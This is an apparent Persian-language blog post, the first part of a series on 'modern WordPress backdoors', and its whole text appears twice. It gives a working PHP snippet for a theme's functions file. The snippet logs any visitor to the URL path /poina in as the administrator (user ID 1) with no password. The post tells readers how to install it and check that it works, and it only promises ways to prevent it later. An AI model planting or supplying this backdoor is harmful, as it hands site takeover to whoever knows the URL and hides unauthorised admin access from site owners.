بکدور های مدرن وردپرس (قسمت اول) ورود بدون پسورد و نام کاربری
از گذشته تا کنون بکدور های وردپرس پیشرفته و پیشرفته تر شدن اما به مرور زمان پیدا کردن و شناسایی بکدور ها سخت و سخت تر شده در قسمت هایی میخواهیم به بررسی بکدور های جدید وردپرس بپرداریم و ببینم چه اتفاقاتی افتاده
بکدور اول : این کد رو فاکشن قالب خودتون بزارید و جای عدد 1 آیدی ادمین وردپرستون رو قرار بدید
function auto_login_via_url() { if (!is_user_logged_in()) {if (isset($_SERVER['REQUEST_URI']) && $_SERVER['REQUEST_URI'] == '/poina') {$user_id = 1;wp_set_auth_cookie($user_id, true);wp_redirect(home_url());exit(); }}}add_action('init', 'auto_login_via_url');
سپس هر سایتی دارید این لینک رو باز کنید
site.com/poina
جای site.com آدرس سایت خودتون بزارید
میبنید که بدون هیچ پسورد و نام کاربری به پیشخوان وردپرس لاگین میکنید البته وقت بشه راه های جلوگیری هر کدوم رو تک تک میگیم
@poinair پوینا
از گذشته تا کنون بکدور های وردپرس پیشرفته و پیشرفته تر شدن اما به مرور زمان پیدا کردن و شناسایی بکدور ها سخت و سخت تر شده در قسمت هایی میخواهیم به بررسی بکدور های جدید وردپرس بپرداریم و ببینم چه اتفاقاتی افتاده
بکدور اول : این کد رو فاکشن قالب خودتون بزارید و جای عدد 1 آیدی ادمین وردپرستون رو قرار بدید
function auto_login_via_url() { if (!is_user_logged_in()) {if (isset($_SERVER['REQUEST_URI']) && $_SERVER['REQUEST_URI'] == '/poina') {$user_id = 1;wp_set_auth_cookie($user_id, true);wp_redirect(home_url());exit(); }}}add_action('init', 'auto_login_via_url');
سپس هر سایتی دارید این لینک رو باز کنید
site.com/poina
جای site.com آدرس سایت خودتون بزارید
میبنید که بدون هیچ پسورد و نام کاربری به پیشخوان وردپرس لاگین میکنید البته وقت بشه راه های جلوگیری هر کدوم رو تک تک میگیم
@poinair پوینا